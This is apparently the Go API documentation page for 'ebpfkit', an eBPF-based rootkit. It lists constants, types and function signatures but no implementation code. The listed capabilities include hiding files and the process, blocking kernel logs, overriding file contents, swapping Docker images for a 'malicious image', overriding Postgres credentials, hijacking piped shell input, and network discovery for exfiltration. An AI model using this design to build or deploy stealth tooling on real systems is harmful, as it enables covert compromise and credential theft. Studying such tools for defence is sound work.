Documentation
¶
Index ¶
- Constants
- Variables
- func EncodeDNS(name string) ([DNSMaxLength]byte, error)
- func EncodeIPv4(ip string) ([]byte, error)
- func FNVHashByte(b []byte) uint64
- func FNVHashInt(i int) uint64
- func FNVHashStr(s string) uint64
- func GetExeHash() uint64
- func GetHostByteOrder() binary.ByteOrder
- func MustEncodeDNS(name string) [DNSMaxLength]byte
- func MustEncodeIPv4(ip string) []byte
- func MustEncodeMD5(password string, role string) [36]byte
- func MustEncodeRole(role string) [64]byte
- func NewCommBuffer(from string, to string) [32]byte
- func NewDockerImage64(image string) [64]byte
- func NewDockerImage68(image string) [68]byte
- func NewFSWatchFilepath(key string) [256]byte
- func NewHTTPDataBuffer(data string) [256]byte
- func NewPipedProgram(prog string) [467]byte
- func NewRawPacketBuffer(b []byte) [64]byte
- func ProgGetNextId(prev int) (int, error)
- type CommProgKey
- type EBPFKit
- func (e *EBPFKit) FaBlockKmsg() ([]FaFdKey, error)
- func (e *EBPFKit) FaFillKmsgMap()
- func (e *EBPFKit) FaHideFile(fsType string, dir string, file string)
- func (e *EBPFKit) FaOverrideContent(fsType string, path string, reader io.Reader, append bool, comm string)
- func (e *EBPFKit) FaOverrideReturn(fsType string, path string, value int64)
- func (e *EBPFKit) FaPutFdContent(m *ebpf.Map, id uint64, reader io.Reader)
- func (e *EBPFKit) FaPutPathAttr(m *ebpf.Map, path string, attr FaPathAttr, override bool) error
- func (e *EBPFKit) FaUnBlockKsmg(faFdKeys []FaFdKey) error
- func (e *EBPFKit) FatGetFdKeys(path string) []FaFdKey
- func (e *EBPFKit) HideMyself() error
- func (e *EBPFKit) Kmsg(str string)
- func (e *EBPFKit) ParseMountInfo(pid int32) ([]*mountinfo.Info, error)
- func (e *EBPFKit) Start() error
- func (e *EBPFKit) Stop() error
- type FSWatchKey
- type FaFdAttr
- type FaFdContent
- type FaFdContentKey
- type FaFdKey
- type FaPathAttr
- type FaPathKey
- type HTTPAction
- type HTTPDataBuffer
- type HTTPHandler
- type HTTPRoute
- type ImageOverride
- type ImageOverrideKey
- type Options
- type RawPacket
- type RawPacketID
- type RawSyscallProg
Constants ¶
View Source
const ( FaKMsgAction uint64 = 1 FaOverrideContentAction uint64 = 2 FaOverrideReturnAction uint64 = 4 FaHideFileAction uint64 = 8 FaAppendContentAction uint64 = 16 )
fs actions
View Source
const ( FaKMsgProg = iota + FaKMsgAction FaOverrideContentProg FaFillWithZeroProg = 10 FaOverrideGetDentsProg = 11 )
progs
View Source
const ( // DockerImageNop is used to indicate that ebpfkit shouldn't change anything for the current image. DockerImageNop uint16 = iota // DockerImageReplace is used to indicate that ebpfkit should replace the old image with the one provided in the // ReplaceWith field. DockerImageReplace )
View Source
const ( // PingNop means that the rootkit will not answer to the ping PingNop uint16 = iota // PingCrash means that the pause container should crash PingCrash // PingRun means that the pause container should behave as the normal k8s pause container, while running its payload PingRun // PingHide means that the pause container should behave as the normal k8s pause container, while running its payload // from a hidden pid PingHide )
View Source
const ( // DNSMaxLength is the max DNS name length in a DNS request or response DNSMaxLength = 256 // DNSMaxLabelLength is the max size of a label in a DNS request or response DNSMaxLabelLength = 63 )
View Source
const ( // PipeOverridePythonKey is the key used to override a piped stdin to a python process PipeOverridePythonKey = uint32(1) // PipeOverrideShellKey is the key used to override a piped stdin to a shell process PipeOverrideShellKey = uint32(2) )
Variables ¶
View Source
var ( // HealthCheckRequest is the default healthcheck request HealthCheckRequest = NewHTTPDataBuffer("GET /healthcheck HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nConnection: keep-alive\nHost: localhost:8000") // HealthCheckRequestLen is the length of the default healthcheck request HealthCheckRequestLen = uint32(255) )
View Source
var ByteOrder binary.ByteOrder
ByteOrder holds the hosts byte order
Functions ¶
func EncodeDNS ¶
func EncodeDNS(name string) ([DNSMaxLength]byte, error)
EncodeDNS returns the DNS packet representation of a domain name
func EncodeIPv4 ¶
EncodeIPv4 returns an IPv4 in its 4 byte long representation
func FNVHashByte ¶
func FNVHashInt ¶
func FNVHashStr ¶
func GetExeHash ¶
func GetExeHash() uint64
func GetHostByteOrder ¶
GetHostByteOrder guesses the hosts byte order
func MustEncodeDNS ¶
func MustEncodeDNS(name string) [DNSMaxLength]byte
MustEncodeDNS returns the DNS packet representation of a domain name or panic
func MustEncodeIPv4 ¶
MustEncodeIPv4 returns an IPv4 in its 4 bytes long representation or fatal
func MustEncodeMD5 ¶
func MustEncodeRole ¶
func NewCommBuffer ¶
func NewDockerImage64 ¶
func NewDockerImage68 ¶
func NewFSWatchFilepath ¶
func NewHTTPDataBuffer ¶
func NewPipedProgram ¶
func NewRawPacketBuffer ¶
func ProgGetNextId ¶
Types ¶
type CommProgKey ¶
type EBPFKit ¶
type EBPFKit struct {
// contains filtered or unexported fields
}
EBPFKit is the main EBPFKit structure
func (*EBPFKit) FaBlockKmsg ¶
func (*EBPFKit) FaFillKmsgMap ¶
func (e *EBPFKit) FaFillKmsgMap()
func (*EBPFKit) FaOverrideContent ¶
func (*EBPFKit) FaOverrideReturn ¶
func (*EBPFKit) FaPutFdContent ¶
func (*EBPFKit) FaPutPathAttr ¶
func (*EBPFKit) FaUnBlockKsmg ¶
func (*EBPFKit) FatGetFdKeys ¶
func (*EBPFKit) HideMyself ¶
func (*EBPFKit) ParseMountInfo ¶
type FSWatchKey ¶
type FaFdAttr ¶
FaFdAttr represents a file
type FaFdContent ¶
func (*FaFdContent) Bytes ¶
func (p *FaFdContent) Bytes() []byte
Bytes returns array of byte representation
func (*FaFdContent) Write ¶
func (p *FaFdContent) Write(buffer []byte)
Write write binary representation
type FaFdContentKey ¶
func (*FaFdContentKey) Bytes ¶
func (p *FaFdContentKey) Bytes() []byte
Bytes returns array of byte representation
func (*FaFdContentKey) Write ¶
func (p *FaFdContentKey) Write(buffer []byte)
Write write binary representation
type FaPathAttr ¶
type FaPathAttr struct {
FSType string
Action uint64
OverrideID uint64
ReturnValue int64
HiddenHash uint64
Comm string
}
FaPathAttr represents attr to apply for a path
func (*FaPathAttr) Bytes ¶
func (p *FaPathAttr) Bytes() []byte
Bytes returns array of byte representation
func (*FaPathAttr) String ¶
func (p *FaPathAttr) String() string
func (*FaPathAttr) Write ¶
func (p *FaPathAttr) Write(buffer []byte)
Write write binary representation
type FaPathKey ¶
FaPathKey represents a path node used to match in-kernel path
func FaPathKeys ¶
FsPathKeys returns a list of FsPathKey for the given path
type HTTPAction ¶
type HTTPAction uint32
HTTPAction is used to define the action to take for a given HTTP request
const ( // Drop indicates that the packet should be dropped Drop HTTPAction = iota + 1 // Edit indicates that the packet should be edited with the provided data Edit )
type HTTPDataBuffer ¶
type HTTPDataBuffer [256]byte
HTTPDataBuffer contains the HTTP data used to replace the initial request
type HTTPHandler ¶
type HTTPHandler uint32
HTTPHandler is used to route HTTP requests to eBPF handlers
const ( // HTTPActionHandler is the handler used to apply the requested HTTP action HTTPActionHandler HTTPHandler = iota // AddFSWatchHandler is the handler used to add a filesystem watch AddFSWatchHandler // DelFSWatchHandler is the handler used to remove a filesystem watch DelFSWatchHandler // GetFSWatchHandler is the handler used to dump a file GetFSWatchHandler // DNSResponseHandler is the handler used to handle DNS response DNSResponseHandler // PutPipeProgHandler is the handler used to send a new piped program PutPipeProgHandler // DelPipeProgHandler is the handler used to delete a piped program DelPipeProgHandler // PutDockerImageHandler is the handler used to send a new Docker image override PutDockerImageHandler // DelDockerImageHandler is the handler used to remove a Docker image override request DelDockerImageHandler // PutPostgresRoleHandler is the handler used to override a set of Postgres credentials PutPostgresRoleHandler // DelPostgresRoleHandler is the handler used to remove a set of Postgres credentials DelPostgresRoleHandler // XDPDispatch is the main XDP dispatch program XDPDispatch // TCDispatch is the main TC dispatch program TCDispatch // GetNetworkDiscoveryHandler is the handler used to prepare the exfiltration of network discovery data GetNetworkDiscoveryHandler // NetworkDiscoveryScanHandler is the handler used to actively scan the network to discover hosts and services NetworkDiscoveryScanHandler // ARPMonitoringHandler is the handler used monitoring ARP replies ARPMonitoringHandler // SYNLoopHandler is the handler used for active network discovery SYNLoopHandler )
type HTTPRoute ¶
type HTTPRoute struct {
HTTPAction HTTPAction
Handler HTTPHandler
NewDataLen uint32
NewData [256]byte
}
type ImageOverride ¶
type ImageOverride struct {
// Override defines if eBPFKit should override the image
Override uint16
// Ping defines what the malicious image should do on startup
Ping uint16
// Prefix defines the minimum length of the prefix used to query the LPM trie. Use the same value as the key.
Prefix uint32
// ReplaceWith defines the Docker image to use instead of the one defined in the key.
ReplaceWith [64]byte
}
type ImageOverrideKey ¶
type Options ¶
type Options struct {
TargetHTTPServerPort int
IngressIfname string
EgressIfname string
DockerDaemonPath string
PostgresqlPath string
WebappPath string
DisableNetwork bool
DisableBPFObfuscation bool
SrcFile string
TargetFile string
AppendMode bool
Comm string
}
Options contains the parameters
type RawPacket ¶
func NewRawPacket ¶
type RawPacketID ¶
type RawPacketID uint32
RawPacketID is used to push raw packets to the kernel
const ( // ARPRequestRawPacket is a raw ARP request packet ARPRequestRawPacket RawPacketID = iota + 1 // SYNRequestRawPacket is a raw SYN request packet SYNRequestRawPacket )
type RawSyscallProg ¶
type RawSyscallProg uint32
RawSyscallProg is used to define the tail call key of each syscall
Source Files
Click to show internal directories.
Click to hide internal directories.